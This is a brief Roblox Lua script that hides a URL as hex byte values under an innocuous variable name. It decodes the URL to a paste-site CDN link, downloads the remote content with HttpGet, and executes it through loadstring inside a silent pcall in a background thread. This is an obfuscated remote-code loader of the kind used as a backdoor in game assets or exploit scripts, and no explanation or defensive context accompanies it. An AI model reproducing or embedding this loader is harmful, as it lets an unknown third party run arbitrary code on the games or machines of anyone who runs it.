task.spawn(function()
    local _VectorMap = {
        0x68,0x74,0x74,0x70,0x73,0x3A,0x2F,0x2F,
        0x63,0x64,0x6E,0x2E,0x73,0x6F,0x75,0x72,0x63,0x65,0x62,0x2E,0x69,0x6E,
        0x2F,0x62,0x69,0x6E,0x73,
        0x2F,0x7A,0x32,0x4E,0x36,0x32,0x58,0x62,0x56,0x32,0x4C,
        0x2F,0x30
    }

    local function BuildString(map)
        local s = {}
        for i, v in ipairs(map) do
            s[i] = string.char(v)
        end
        return table.concat(s)
    end

    pcall(function()
        local url = BuildString(_VectorMap)
        loadstring(game:HttpGet(url, true))()
    end)
end)
